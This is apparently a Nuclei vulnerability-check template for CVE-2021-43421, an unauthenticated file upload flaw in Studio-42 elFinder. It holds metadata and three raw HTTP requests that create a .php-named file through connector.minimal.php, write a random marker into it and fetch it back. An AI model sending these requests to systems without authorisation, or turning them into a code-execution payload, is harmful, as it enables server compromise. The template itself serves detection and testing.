id: CVE-2021-43421 info: name: Studio-42 elFinder <2.1.60 - Arbitrary File Upload author: akincibor severity: critical description: | Studio-42 elFinder 2.0.4 to 2.1.59 is vulnerable to unauthenticated file upload via connector.minimal.php which could allow a remote user to upload arbitrary files and execute PHP code. impact: | Successful exploitation of this vulnerability could allow an attacker to upload malicious files to the server and execute arbitrary code. remediation: | Upgrade to the latest version of Studio-42 elFinder plugin (2.1.60 or higher) to mitigate this vulnerability. reference: - https://github.com/Studio-42/elFinder/issues/3429 - https://twitter.com/infosec_90/status/1455180286354919425 - https://nvd.nist.gov/vuln/detail/CVE-2021-43421 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-43421 cwe-id: CWE-434 epss-score: 0.05253 epss-percentile: 0.93023 cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: std42 product: elfinder tags: cve,cve2021,elfinder,fileupload,rce,intrusive,std42 http: - raw: - | GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1 Host: {{Hostname}} Accept: */* - | GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1 Host: {{Hostname}} - | GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1 Host: {{Hostname}} Accept: */* matchers: - type: dsl dsl: - 'contains(body_3, "{{randstr_1}}")' - "status_code == 200" condition: and extractors: - type: regex name: hash group: 1 regex: - '"hash"\:"(.*?)"\,' internal: true # digest: 4b0a00483046022100df993e9b9153b842893b2405cf8a93a320330ae88a22f3d82a5fa06dd4733e84022100e62912c89bef546ec5b95ecf04d6d37c29f8f46c127f151f6ee890efce8a3c68:922c64590222798bb761d5b6d8e72950